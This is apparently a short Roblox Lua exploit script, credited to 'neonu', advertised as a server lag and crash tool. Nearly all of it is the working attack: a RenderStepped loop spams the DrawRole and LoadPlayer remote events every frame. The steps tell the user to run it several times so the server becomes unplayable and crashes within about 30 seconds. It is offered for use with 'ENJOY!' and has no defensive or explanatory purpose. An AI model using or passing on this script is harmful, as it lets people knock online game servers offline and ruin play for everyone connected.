Created by neonu
Features:
- LAG/CRASH SERVER
steps:
1. execute script (multiple times is better)
2. wait 20-30 secs
3. server crashes in 30 secs 100% of the time if you wait, while the game is completely unplayable for the whole 30 secs
game:GetService('RunService').RenderStepped:connect(function()
wait()
local args = {
[1] = true
}
game:GetService("ReplicatedStorage").RemoteEvents.DrawRole:FireServer(unpack(args))
game:GetService("ReplicatedStorage").RemoteEvents.LoadPlayer:FireServer()
end)
ENJOY!